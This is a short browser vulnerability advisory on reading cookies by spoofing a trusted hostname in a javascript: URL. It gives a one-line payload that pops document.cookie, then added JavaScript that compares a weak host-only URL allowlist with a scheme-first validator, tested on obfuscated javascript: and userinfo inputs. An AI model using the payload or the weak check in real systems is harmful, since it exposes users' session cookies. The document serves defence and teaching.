It is possible to obtain a cookie by spoofing a valid hostname in a javascript: URL. For example:

    f.location = "javascript://www.google.com/\n" + "'<body onload=alert(document.cookie)>'";
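The same string also defeats application code that vets a navigation target by hostname alone. The following added example (not part of the original advisory, and going beyond the browser bug it reports) shows a host-only check beside a scheme-first check. The function names and the allowlist are hypothetical.

```javascript
'use strict';

// The string from the advisory. "//www.google.com/" reads as a URL authority
// to a URL parser and as a line comment to the JavaScript engine; the newline
// ends the comment, so the quoted markup after it is what gets evaluated.
const ADVISORY_URL =
  "javascript://www.google.com/\n" + "'<body onload=alert(document.cookie)>'";

const TRUSTED_HOSTS = new Set(['www.google.com']); // constructed allowlist
const WEB_SCHEMES = new Set(['http:', 'https:']);

// Parse with the WHATWG URL parser; it strips tabs/newlines and lowercases
// the scheme, which matches how browsers interpret the string.
function parse(input, base) {
  try { return new URL(input, base); } catch { return null; }
}

// Weak (hypothetical): trusts whatever hostname the parser reports.
function hostOnlyCheck(input, base) {
  const u = parse(input, base);
  return u !== null && TRUSTED_HOSTS.has(u.hostname);
}

// Hardened (hypothetical): the scheme is checked before the host is believed.
function isSafeNavigationTarget(input, base) {
  const u = parse(input, base);
  if (u === null) return false;
  if (!WEB_SCHEMES.has(u.protocol)) return false; // rejects javascript:, data:, ...
  if (u.username !== '' || u.password !== '') return false; // no userinfo tricks
  return TRUSTED_HOSTS.has(u.hostname);
}

// Constructed sample inputs, including scheme-obfuscated variants.
const SAMPLES = [
  ADVISORY_URL,
  '  JavaScript://www.google.com/%0A1',
  'java\tscript://www.google.com/x',
  'https://www.google.com/search?q=1',
  'https://www.google.com@evil.example/',
];

function report() {
  return SAMPLES.map((s) => ({
    input: JSON.stringify(s),
    hostOnly: hostOnlyCheck(s),
    hardened: isSafeNavigationTarget(s),
  }));
}

console.table(report());
```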
vulners.com/securityvulns/securityvulns:doc:3256